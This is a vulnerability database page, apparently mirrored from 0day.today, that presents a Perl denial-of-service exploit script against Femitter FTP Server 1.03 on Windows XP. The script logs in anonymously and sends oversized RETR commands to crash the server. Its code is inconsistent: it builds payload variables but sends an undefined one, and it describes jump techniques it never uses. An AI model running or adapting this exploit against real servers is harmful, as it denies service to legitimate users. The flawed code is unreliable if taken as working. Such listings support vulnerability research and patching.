Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtFernando Mengali1337DAY-ID-39227
HistoryJan 08, 2024 - 12:00 a.m.

Femitter FTP Server 1.03 Denial Of Service Exploit

2024-01-0800:00:00
Fernando Mengali
0day.today
68
femitter ftp server
denial of service
windows xp
exploit
fernando mengali
memory corruption
remote attackers
deprecated
net::ftp

7.4 High

AI Score

Confidence

Low

JSON
#!/usr/bin/perl

use Net::FTP;

# Exploit Title: Femitter FTP Server 1.03 - Denial of Service (DoS)
# Discovery by: Fernando Mengali
# Vendor Homepage:  https://acritum.com/
# Download to demo: https://drive.google.com/file/d/1GBFmc7tMavA9mMoZPYVlUVUe62dGjBhF/view?usp=sharing
# Notification vendor: No reported
# Tested Version: Femitter FTP Server 1.03
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denial of Service (DoS)
# VΓ­deo: https://drive.google.com/file/d/1n_WzyNiOwHRen60en5rh56Q4AyDfVbF_/view?usp=sharing

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Jump to a static 'call esp'
#Backwards jump to code a known distance from the stack pointer.
#The server does not correctly handle the amount of data or bytes of the command RETR, resulting in memory corruption.
#When authenticating to the FTP server with a long RETR or a RETR with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing denial of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

    $sis="$^O";

    if ($sis eq "windows"){
      $cmd="cls";
    } else {
      $cmd="clear";
    }

    system("$cmd");
    
    intro();
    main();
    
    print "[+] Exploiting... \n";

    my $payload = "\x41\x2C\x41\x20\x42"x500;

    my $ftp = Net::FTP->new($ip, Debug => 0) or die "Could not connect: $@";

    my $sc= "A"x800;

    $ftp->login("anon","anon") or die "Failed: " . $ftp->message;

    $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;
    $ftp->quot("RETR ".$c."\r\n") or die "Error: " . $ftp->message;

    $ftp->quit;

    print "[+] Done - Exploited success!!!!!\n\n";
  
   sub intro {
      print "######################################################################\n";
      print "#                Femitter FTP Server 1.03 - Denial of Service        #\n";
      print "#                                                                    #\n";
      print "#                       Coded by Fernando Mengali                    #\n";
      print "#                                                                    #\n";
      print "#                 e-mail: fernando.mengalli\@gmail.com                #\n";
      print "#                                                                    #\n";
      print "######################################################################\n";
  }

  sub main {

our ($ip, $port) = @ARGV;

      unless (defined($ip) && defined($port)) {

        print "       \nUsage: $0 <ip> <port>                 \n";
        exit(-1);

      }
  }

#3. Solution/ How to fix:

# This version product is deprecated

7.4 High

AI Score

Confidence

Low

JSON